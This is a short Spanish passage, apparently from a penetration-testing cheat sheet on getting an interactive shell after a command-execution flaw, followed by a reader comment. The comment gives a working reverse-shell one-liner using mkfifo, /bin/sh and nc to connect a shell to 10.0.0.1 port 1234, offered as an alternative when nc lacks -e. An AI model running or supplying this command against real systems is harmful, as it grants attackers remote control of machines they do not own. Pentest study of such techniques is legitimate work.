Si tienes la suerte de encontrar una vulnerabilidad de ejecución de comandos durante una prueba de penetración, pronto querrás un shell interactivo. Si no es posible agregar un nuevo archivo de cuenta / clave SSH / .rhosts e simplemente iniciar sesión, es probable que su próximo paso sea volver a truncar un shell inverso o unir un shell a un puerto TCP.
ha comentado hace más de 5 años
Sin embargo, nc no siempre acepta el parametro -e .esta puede ser otra alternativa: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f